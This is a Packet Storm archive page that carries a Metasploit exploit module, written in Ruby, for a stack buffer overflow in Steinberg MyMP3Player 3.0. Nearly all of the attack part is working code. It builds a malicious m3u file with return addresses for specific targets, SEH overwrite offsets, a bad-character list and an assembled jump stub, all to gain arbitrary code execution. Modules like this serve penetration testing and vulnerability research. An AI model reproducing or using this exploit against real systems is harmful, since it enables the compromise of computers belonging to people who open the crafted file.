what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Steinberg MyMP3Player 3.0 Buffer Overflow

Steinberg MyMP3Player 3.0 Buffer Overflow
Posted Apr 1, 2010
Authored by n3w7u, m_101 | Site metasploit.com

This Metasploit module exploits a stack buffer overflow in Steinberg MyMP3Player == 3.0. When the application is used to open a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution.

tags | exploit, overflow, arbitrary, code execution
SHA-256 | 530e98a4daaeaef53182275a02e9b8844a83ed808bd2d4d1a98e08bf875f7c03

Steinberg MyMP3Player 3.0 Buffer Overflow

Change Mirror Download
##
# $Id: mymp3player_m3u.rb 8975 2010-04-01 17:10:07Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
super(update_info(info,
'Name' => 'Steinberg MyMP3Player 3.0 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Steinberg MyMP3Player == 3.0. When
the application is used to open a specially crafted m3u file, a buffer overflow occurs
allowing arbitrary code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'n3w7u', # original
'm_101'
],
'Version' => '$Revision: 8975 $',
'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/11791' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 900,
'BadChars' => "\x00\x0a\x0d\x5c",
'DisableNops' => true,
'PrependEncoder' => "\x81\xc4\xf0\xef\xff\xff"
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x0043bea3 } ], # call ecx in My MP3.exe v3.0.0.67
[ 'Windows Universal (SEH)', { 'Ret' => 0x00403e68 } ], # p/p/r in My MP3.exe v3.0.0.67
[ 'Windows XP SP3 French', { 'Ret' => 0x72c6170b } ], # seh return in msacm.drv
],
'Privileged' => false,
'DisclosureDate' => 'March 18 2010',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),
], self.class)

end

def exploit

# direct ret overwrite at offset 1024
# nseh overwrite at offset 1040
ret_offset = 1024
seh_offset = 1040

# start with the payload
m3u = payload.encoded

if (target.name =~ /SEH/)
m3u << rand_text_alphanumeric(seh_offset - m3u.length)
# ensure bad,no-nul addr for ret (trigger SEH)
m3u[ret_offset,4] = [0xc0010101 | rand(0xffffffff)].pack('V')

# We utilize a small stub near the end of the buffer space to
# continue to the real shellcode...
# NOTE: the push is to avoid a badchar (0x5c)
stub = %Q|
push ecx
sub esp,-0x1a8
ret
|
stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub).encode_string
m3u[seh_offset - stub.length, stub.length] = stub

# Jump back to the stub
jmp2 = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + stub.length.to_s).encode_string
seh = ''
seh << jmp2
seh << rand_text(2)
seh << [target.ret].pack('V')
m3u << seh
else
m3u << rand_text_alphanumeric(1024 - m3u.length)
m3u << [target.ret].pack('V')
end

print_status("Creating '#{datastore['FILENAME']}' file ...")

file_create(m3u)

end

end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close